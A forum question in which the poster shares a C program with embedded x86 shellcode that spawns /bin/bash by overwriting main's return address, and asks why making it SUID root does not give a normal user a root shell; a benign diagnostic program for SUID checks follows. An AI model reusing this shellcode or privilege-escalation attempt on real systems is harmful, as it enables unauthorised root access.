I have made a script in C which spawns a shell. Here it is
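char shellcode[] = "\xeb\x18\x5e\x31\xc0\x88\x46\x09\x89\x76\x0a\x89\x46\x0e\xb0\x0b\x89\xf3\x8d\x4e\x0a\x8d\x56\x0e\xcd\x80\xe8\xe3\xff\xff\xff\x2f\x62\x69\x6e\x2f\x62\x61\x73\x68\x41\x42\x42\x42\x42\x43\x43\x43\x43\x43";
int main(void) {
    int *ret;                  /* local variable, so &ret is an address inside main's stack frame */
    ret = (int *)&ret + 2;     /* two ints above ret: the slot this code treats as the saved return address */
    (*ret) = (int)shellcode;   /* overwrite it so that returning from main jumps to the shellcode bytes */
}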
I have made it as root & set it as suid by
Now I have copied this file to a normal user's location & executed it as a normal user. So I expected a root shell for the normal user, but I got the bash shell as a normal user.
I don't understand why I am not getting a root shell?
According to the definition of SUID, it is
If the SUID bit is set for any application then your user ID would be set as that of the owner of application/file rather than the current user, while running that application.
So what am I doing wrong?
My OS info
Linux bt 3.2.6 #1 SMP Fri Feb 17 10:40:05 EST 2012 i686 GNU/Linux
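
An added diagnostic, not part of the original post: the SUID definition quoted above only applies if the bit is actually present on the file being executed and the filesystem honours it. The sketch below (struct and function names are this example's own) reports a file's owner, its `S_ISUID` bit, whether its filesystem is mounted `nosuid`, and the caller's real and effective UIDs.

```c
#include <stdio.h>
#include <sys/stat.h>
#include <sys/statvfs.h>
#include <sys/types.h>
#include <unistd.h>

/* What the kernel consults when deciding the effective UID at exec time. */
struct suid_report {
    int   suid_bit;   /* S_ISUID is set in the file mode */
    int   nosuid_fs;  /* filesystem is mounted nosuid, so the bit is ignored */
    uid_t owner;      /* file owner: the effective UID a SUID exec would grant */
    uid_t ruid;       /* caller's real UID; SUID never changes this one */
    uid_t euid;       /* caller's current effective UID */
};

/* Fill r for path. Returns 0 on success, -1 if stat() or statvfs() fails. */
int suid_inspect(const char *path, struct suid_report *r)
{
    struct stat st;
    struct statvfs vfs;

    if (stat(path, &st) != 0 || statvfs(path, &vfs) != 0)
        return -1;
    r->suid_bit  = (st.st_mode & S_ISUID) != 0;
    r->nosuid_fs = (vfs.f_flag & ST_NOSUID) != 0;
    r->owner     = st.st_uid;
    r->ruid      = getuid();
    r->euid      = geteuid();
    return 0;
}

/* 1 if executing the file would switch the effective UID to its owner. */
int suid_takes_effect(const struct suid_report *r)
{
    return r->suid_bit && !r->nosuid_fs;
}

int main(int argc, char **argv)
{
    struct suid_report r;

    if (argc < 2 || suid_inspect(argv[1], &r) != 0) {
        fprintf(stderr, "usage: %s FILE (FILE must exist)\n", argv[0]);
        return 1;
    }
    printf("owner=%lu suid_bit=%d nosuid_fs=%d takes_effect=%d\n",
           (unsigned long)r.owner, r.suid_bit, r.nosuid_fs, suid_takes_effect(&r));
    printf("caller: ruid=%lu euid=%lu\n", (unsigned long)r.ruid, (unsigned long)r.euid);
    return 0;
}
```

Run it against the copy in the user's directory rather than the original file. Even when the bit takes effect, only the effective UID becomes the owner's; the real UID stays that of the invoking user.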